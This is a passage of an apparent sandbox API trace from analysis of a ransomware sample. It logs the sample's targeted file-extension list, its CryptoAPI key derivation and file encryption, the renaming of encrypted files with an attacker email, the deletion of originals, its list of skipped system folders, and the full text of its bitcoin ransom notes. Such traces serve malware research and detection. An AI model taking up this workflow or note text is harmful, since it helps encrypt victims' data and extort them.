fv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0164.138] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0164.138] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0164.139] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0164.199] ReadFile (in: hFile=0x39c, lpBuffer=0x2909020, nNumberOfBytesToRead=0x38b5ce, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0x2909020*, lpNumberOfBytesRead=0x189930*=0x38b5ce, lpOverlapped=0x0) returned 1
	[0164.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.666] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb000) returned 1
	[0164.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.668] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0164.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.669] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0164.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.669] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8f70) returned 1
	[0164.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.669] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x38b5ce, dwBufLen=0x38b5ce | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x38b5d0) returned 1
	[0164.748] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0164.748] RtlMoveMemory (in: Destination=0x2cac020, Source=0x2909020, Length=0x38b5ce | out: Destination=0x2cac020) 
	[0164.908] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.909] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2cac020*, pdwDataLen=0x1894dc*=0x38b5ce, dwBufLen=0x38b5d0 | out: pbData=0x2cac020*, pdwDataLen=0x1894dc*=0x38b5d0) returned 1
	[0165.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0165.114] CryptDestroyKey (hKey=0xfb8f70) returned 1
	[0165.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0165.115] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0165.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0165.115] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0165.115] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0165.115] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0165.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0165.116] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0165.117] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 154
	[0165.117] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0165.118] WriteFile (in: hFile=0x3a0, lpBuffer=0x2cac020*, nNumberOfBytesToWrite=0x38b5d0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x2cac020*, lpNumberOfBytesWritten=0x189938*=0x38b5d0, lpOverlapped=0x0) returned 1
	[0165.442] CloseHandle (hObject=0x3a0) returned 1
	[0165.811] CloseHandle (hObject=0x39c) returned 1
	[0165.811] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat")) returned 1
	[0165.986] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat")) returned 0
	[0165.987] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd587a18c, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587a18c, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0
	[0165.987] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0165.988] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0165.988] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16"
	[0165.988] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*"
	[0165.988] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0165.989] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0165.989] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\HELP_DECRYPT_YOUR_FILES.TXT") returned 114
	[0165.989] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0165.990] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0165.990] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0165.993] CloseHandle (hObject=0x390) returned 1
	[0165.993] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0165.994] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0165.994] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0165.995] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0165.995] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0165.996] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0165.996] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0165.996] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0165.996] CloseHandle (hObject=0x390) returned 1
	[0165.997] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0165.997] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0165.997] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0165.997] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\HELP_DECRYPT_YOUR_FILES.HTML") returned 115
	[0165.997] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0165.998] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0165.998] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0166.002] CloseHandle (hObject=0x390) returned 1
	[0166.015] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.015] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.028] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0166.029] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.029] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.029] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.030] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.030] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0166.030] CloseHandle (hObject=0x390) returned 1
	[0166.031] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0x7c5c46e7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c78032c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.032] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*") returned 90
	[0166.032] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.032] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\*.*", cchLength=0x5a | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*") returned 0x5a
	[0166.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.033] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="windows") returned 0x0
	[0166.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.033] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="boot") returned 0x0
	[0166.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.033] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="system volume information") returned 0x0
	[0166.033] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.034] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.034] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="temp") returned 0x0
	[0166.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.034] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="program files") returned 0x0
	[0166.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.034] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.034] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="appdata") returned 0x0
	[0166.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="application data") returned 0x0
	[0166.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="winnt") returned 0x0
	[0166.035] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.035] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="tmp") returned 0x0
	[0166.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="cache") returned 0x0
	[0166.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="webcache") returned 0x0
	[0166.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="inetcache") returned 0x0
	[0166.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="nvidia") returned 0x0
	[0166.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="packages") returned 0x0
	[0166.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="cookies") returned 0x0
	[0166.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\*.*", lpSrch="programdata") returned 0x0
	[0166.038] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.038] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.038] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd584b1e3, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0x7c5c46e7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c78032c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0166.038] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.038] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c78032c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7c78032c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c7cc87e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.038] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c78032c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7c78032c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c78032c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
